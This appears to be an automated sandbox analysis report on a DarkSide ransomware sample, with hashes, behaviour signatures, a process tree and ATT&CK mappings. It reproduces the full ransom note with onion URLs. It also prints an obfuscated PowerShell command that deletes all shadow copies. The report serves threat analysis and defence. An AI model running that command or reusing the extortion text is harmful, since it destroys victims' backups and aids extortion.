Analysis

  • max time kernel
    20s
  • max time network
    13s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    12-05-2021 19:34

General

  • Target

    78782fd324bc98a57274bd3fff8f756217c011484ebf6b614060115a699ee134.exe

  • Size

    59KB

  • MD5

    47a4420ad26f60bb6bba5645326fa963

  • SHA1

    7a29a8f5e14da1ce40365849eb59487dbb389d08

  • SHA256

    78782fd324bc98a57274bd3fff8f756217c011484ebf6b614060115a699ee134

  • SHA512

    08c82585fbab8e090e67e4571f7428bffaf68f9a8c2e34b72f9688205ee880a6435aa813b8845a0b0281c80b78774b969032cc27fc98d3f0e67116dabcf77127

Malware Config

Extracted

Path

C:\\README.341d6443.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, private data was downloaded. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 300GB data. Your personal leak page (TOR LINK): http://darksidedxcftmqa.onion/homehardware/K4fLrrmO5GOIBHbhfJyN5rG4pkPcRlnc48ceUHtNgjONruPRTVc4Usyb96BuHkKa On the page you will find examples of files that have been downloaded. The data is preloaded and will be automatically published in our blog if you do not pay. After publication, your data can be downloaded by anyone, it stored on our tor CDN and will be available for at least 6 months. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. HOW TO CONTACT US? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/FJ6BL608YXVN8DGFDP23JVF2RU0K0IC102LSJA09Z2JF14A1SCCJBOVPLRHSLU16 When you open our website, put the following data in the input form: Key: FSGLQojvXe6Tvm2w0wxP3QfWkJb1USBnFsbmL4CiIX0sBiV727ofcmrdJmUTgBStIrH7sgcBDo4SPki6BniKhpd7d4zjLSAxmtlwLAHLgtBnwYPuW05gxF4VPuXsylwu2p3k6ZWDTjCIZVVG04RCYEfS3AP25AWqGkFDh4KVy7MZsCVH7RwxEdhWyApxi7Ioai3v52ofbfNgys0V0sG2xWqJgtluhQ4J23O7jCZxqMM10civs8NlDmeJAiIkI43RrPDd3P2kA03ky3oUBNeUPOOnAztZQezpfAgiM8evd3HE9aua1yUEX4hndxmFU02CEYIiyah3g5ywISASKAeiXKCJoThOot42MHwMCl0G7wP6KdHVyPx8uhBdT2kbzvjGZvmOibfxKUlxJlhai4DhjDp9mUuJajTrBYoeogvOzrgc8iv0PcrAABLRGU2I9uSFIlFqZeuIp7qMW7DIZKrunidyvfL1oTtuosI8bQ0BVvooDC1BB5n5Biw9x2yBNit4lOjMhY00P3wTLvMhS3ZQ6eGKDmx7GrQ7ydGo6I2A0eQx9dpuxhWpkpc !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/homehardware/K4fLrrmO5GOIBHbhfJyN5rG4pkPcRlnc48ceUHtNgjONruPRTVc4Usyb96BuHkKa

http://darksidfqzcuhtk2.onion/FJ6BL608YXVN8DGFDP23JVF2RU0K0IC102LSJA09Z2JF14A1SCCJBOVPLRHSLU16

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\78782fd324bc98a57274bd3fff8f756217c011484ebf6b614060115a699ee134.exe
    "C:\Users\Admin\AppData\Local\Temp\78782fd324bc98a57274bd3fff8f756217c011484ebf6b614060115a699ee134.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:336
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1904
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:564

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    8645787fde33c535a9c962e6b44ce136

    SHA1

    ee30ea2df6c7f2e37582241f338eda9758e79ade

    SHA256

    971bf31dc898131fbcf7ec0592a71fca18de8fc219d487257b30f522dbd1f4d4

    SHA512

    fb26f24210e83fceaf8d9bdc7c11f09a299d98785b686843bebda4f193c98b109c00bb465919541cb089029cbb2a5923ad0a984b88d4b4e1a9a09d1ddc3895f5

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    e4cc4f6c4689eeacc36158a15176d857

    SHA1

    d906eafda343776d1dcd3fc6750ed1df32db4c7c

    SHA256

    7add8553ee96fb9014dc217bd9d6633cf76e93ce39e3b192d1e3358102a28a0f

    SHA512

    e592d75a69409369d2d11d3d1e1cce916b4bd29822ab05947f5c041d66ac319ce5a29ea564cdc41bd240ad0ac8478c267d649c1b3433668c1d8867b9c39bfa4c

  • memory/336-59-0x0000000075551000-0x0000000075553000-memory.dmp
    Filesize

    8KB

  • memory/1904-66-0x000000001AC54000-0x000000001AC56000-memory.dmp
    Filesize

    8KB

  • memory/1904-63-0x000000001ACD0000-0x000000001ACD1000-memory.dmp
    Filesize

    4KB

  • memory/1904-64-0x0000000002380000-0x0000000002381000-memory.dmp
    Filesize

    4KB

  • memory/1904-62-0x00000000024E0000-0x00000000024E1000-memory.dmp
    Filesize

    4KB

  • memory/1904-65-0x000000001AC50000-0x000000001AC52000-memory.dmp
    Filesize

    8KB

  • memory/1904-67-0x0000000002270000-0x0000000002271000-memory.dmp
    Filesize

    4KB

  • memory/1904-68-0x000000001C5B0000-0x000000001C5B1000-memory.dmp
    Filesize

    4KB

  • memory/1904-69-0x000000001C680000-0x000000001C681000-memory.dmp
    Filesize

    4KB

  • memory/1904-61-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmp
    Filesize

    8KB

  • memory/1904-60-0x0000000000000000-mapping.dmp